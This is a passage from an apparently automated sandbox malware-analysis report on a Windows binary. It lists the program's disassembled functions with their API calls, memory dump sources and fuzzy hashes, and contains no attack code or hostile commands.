                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 641708696-0
                                                                                                                        • Opcode ID: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
                                                                                                                        • Instruction ID: 30d0a4b81ba2f000b36e6c4fb785cd3ddd457784389474be67a17238baca1d2b
                                                                                                                        • Opcode Fuzzy Hash: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
                                                                                                                        • Instruction Fuzzy Hash: 45618031502B61DFDB259F54EA487397FF1FF62312F144918E082AB5A0CB35AC98EB54
                                                                                                                        Function 00529838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00529862
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 259745315-0
                                                                                                                        • Opcode ID: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
                                                                                                                        • Instruction ID: 4cb9e7f3d078a931fe476a7b2be02545f5e048aca7da1330e3f638e743243659
                                                                                                                        • Opcode Fuzzy Hash: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
                                                                                                                        • Instruction Fuzzy Hash: DD41AF31504654AFDB245F38AC88BB93FA5BF27330F184655F9A28B2E2D7319846EB10
                                                                                                                        Function 005A50D4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 005A5186
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 005A51C7
                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 005A51CD
                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 005A51D1
                                                                                                                          • Part of subcall function 005A6FBA: DeleteObject.GDI32(00000000), ref: 005A6FE6
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A520D
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A521A
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005A524D
                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 005A5287
                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 005A5296
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3210457359-2594219639
                                                                                                                        • Opcode ID: af91222d32c97ee58d4a0023129f4cb45ae7f0fa1f0a1f341734ad401d6bbe70
                                                                                                                        • Instruction ID: fe7235efff2c23d5327d5b586f3a8d11d5ceac297eb2c576746703b80b7ff7a7
                                                                                                                        • Opcode Fuzzy Hash: af91222d32c97ee58d4a0023129f4cb45ae7f0fa1f0a1f341734ad401d6bbe70
                                                                                                                        • Instruction Fuzzy Hash: 9B517A34A40A09AEEF249F24DC4AFEC3FA5FF57321F144011F6559A2E1E775A984EB40
                                                                                                                        Function 00528B06 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00566890
                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005668A9
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005668B9
                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005668D1
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005668F2
                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 00566901
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0056691E
                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 0056692D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 1268354404-2594219639
                                                                                                                        • Opcode ID: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
                                                                                                                        • Instruction ID: 5e0b6f25aa68993db56f952f6c905eec3b766dfcd013a009b4c7cdb023e2328e
                                                                                                                        • Opcode Fuzzy Hash: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
                                                                                                                        • Instruction Fuzzy Hash: B2519570A00609AFDB20CF64DC95BAA3FB5FF9A710F104518F9529B2E0DB70E990EB40
                                                                                                                        Function 005A8B02 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                          • Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
                                                                                                                          • Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                                                                                          • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                                                                                          • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 005A8B6B
                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 005A8B71
                                                                                                                        • ReleaseCapture.USER32 ref: 005A8B77
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 005A8C12
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005A8C25
                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 005A8CFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u$p#^
                                                                                                                        • API String ID: 1924731296-3089080794
                                                                                                                        • Opcode ID: f8d4c5faa5ff4695383ca50636a240420c86e0cee78c32b368324acefec1c0df
                                                                                                                        • Instruction ID: d65b7d930107cc718ae49dd7914e4df3004e74037b0c6302dae5329496e7391d
                                                                                                                        • Opcode Fuzzy Hash: f8d4c5faa5ff4695383ca50636a240420c86e0cee78c32b368324acefec1c0df
                                                                                                                        • Instruction Fuzzy Hash: 9A518D70104345AFE714DF14DCA9BAE7BE4FB89714F000529F9929B2E2DB709D48CB62
                                                                                                                        Function 005796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00579717
                                                                                                                        • LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579720
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00579742
                                                                                                                        • LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579745
                                                                                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00579866
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                        • Opcode ID: 244c88c6ab636e7cabeb280391ca582e61dfb7b2ab91eca2f20b73cf9fccaa17
                                                                                                                        • Instruction ID: 80cc43e4dae3be0c9425749b8b5899d28683a7dc2cdb02409d0af7afc2769872
                                                                                                                        • Opcode Fuzzy Hash: 244c88c6ab636e7cabeb280391ca582e61dfb7b2ab91eca2f20b73cf9fccaa17
                                                                                                                        • Instruction Fuzzy Hash: 7541207280021AAADF14EBE0DD9ADEE7B78BF95340F104425F60572092EB356F89DB71
                                                                                                                        Function 005706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005707A2
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005707BE
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005707DA
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00570804
                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0057082C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00570837
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0057083C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                        • Opcode ID: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
                                                                                                                        • Instruction ID: 24b33ed58f2f657a203f1727a9fedcb3e013658d3200f73d438afd1070e70d02
                                                                                                                        • Opcode Fuzzy Hash: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
                                                                                                                        • Instruction Fuzzy Hash: F9411A71C10229EBDF15EFA4DC998EDBBB8FF54350F144526E905A31A1EB30AE44DB90
                                                                                                                        Function 00587A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00587AF3
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00587B8F
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00587BA3
                                                                                                                        • CoCreateInstance.OLE32(005AFD08,00000000,00000001,005D6E6C,?), ref: 00587BEF
                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00587C74
                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00587CCC
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00587D57
                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00587D7A
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00587D81
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00587DD6
                                                                                                                        • CoUninitialize.OLE32 ref: 00587DDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2762341140-0
                                                                                                                        • Opcode ID: 416353643e0d524c75a4a83fd93408b992d7b239f7c11481248a8e1c60fd9519
                                                                                                                        • Instruction ID: e0eb0b44b998ba408dac48f68a003ae90e1cc16954d485a252e6de2c1b545eeb
                                                                                                                        • Opcode Fuzzy Hash: 416353643e0d524c75a4a83fd93408b992d7b239f7c11481248a8e1c60fd9519
                                                                                                                        • Instruction Fuzzy Hash: 1DC10B75A04109AFDB14DFA4C888DAEBFF9FF48304B148499E819AB361D731EE45CB90
                                                                                                                        Function 0056FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0056FAAF
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0056FB08
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0056FB1A
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0056FB3A
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0056FB8D
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0056FBA1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056FBB6
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0056FBC3
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBCC
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056FBDE
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBE9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
                                                                                                                        • Instruction ID: 052c8d2941b85b41d45c82aff44a66275088f8fcaffea0f8c130a4442233d49e
                                                                                                                        • Opcode Fuzzy Hash: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
                                                                                                                        • Instruction Fuzzy Hash: B4415F35E002199FCF00DFA4D8589AEBFB9FF59345F008069E906A7261DB70A945DBA0
                                                                                                                        Function 0059055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 005905BC
                                                                                                                        • inet_addr.WSOCK32(?), ref: 0059061C
                                                                                                                        • gethostbyname.WSOCK32(?), ref: 00590628
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00590636
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005906C6
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005906E5
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 005907B9
                                                                                                                        • WSACleanup.WSOCK32 ref: 005907BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                        • String ID: Ping
                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                        • Opcode ID: 2c03f0b26f0f2f9262b7cc9d0c1a0c81278fcfbbffa0f4973f211701b0707d67
                                                                                                                        • Instruction ID: 9f814ae3ae2f078b379af0feebdecb90875333d50973ea182e424a9ce42a4572
                                                                                                                        • Opcode Fuzzy Hash: 2c03f0b26f0f2f9262b7cc9d0c1a0c81278fcfbbffa0f4973f211701b0707d67
                                                                                                                        • Instruction Fuzzy Hash: F5916C356042019FDB20DF15D488B1ABFE4FF85328F1599A9E4698B6A2C730FD85CF91
                                                                                                                        Function 00598CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                        • Opcode ID: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
                                                                                                                        • Instruction ID: a53a5601b67f748e7e8b52716f4967f956f04f3a7f262ffda55c86cccd0f5692
                                                                                                                        • Opcode Fuzzy Hash: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
                                                                                                                        • Instruction Fuzzy Hash: AC519431A001179BCF24DF6CC9509BEBBA5BF66720B244629E426E73C4DB35DD40C790
                                                                                                                        Function 0059372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32 ref: 00593774
                                                                                                                        • CoUninitialize.OLE32 ref: 0059377F
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,005AFB78,?), ref: 005937D9
                                                                                                                        • IIDFromString.OLE32(?,?), ref: 0059384C
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 005938E4
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00593936
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                        • Opcode ID: 7ee26287113f4290c66be00e7792d7903f0b5acf9940ff424e194314539548d0
                                                                                                                        • Instruction ID: 21e47184bd8155c0ce31768e3ffbbb48a829bf99ac12fd1f2fd0b081e013da92
                                                                                                                        • Opcode Fuzzy Hash: 7ee26287113f4290c66be00e7792d7903f0b5acf9940ff424e194314539548d0
                                                                                                                        • Instruction Fuzzy Hash: EB617971608202EFDB10DF54D889B6ABFE8FF89710F004819F9859B291D770EE49CB92
                                                                                                                        Function 00515BEA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 184windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00515C7A
                                                                                                                          • Part of subcall function 00515D0A: GetClientRect.USER32(?,?), ref: 00515D30
                                                                                                                          • Part of subcall function 00515D0A: GetWindowRect.USER32(?,?), ref: 00515D71
                                                                                                                          • Part of subcall function 00515D0A: ScreenToClient.USER32(?,?), ref: 00515D99
                                                                                                                        • GetDC.USER32 ref: 005546F5
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00554708
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00554716
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0055472B
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00554733
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005547C4
                                                                                                                        Strings
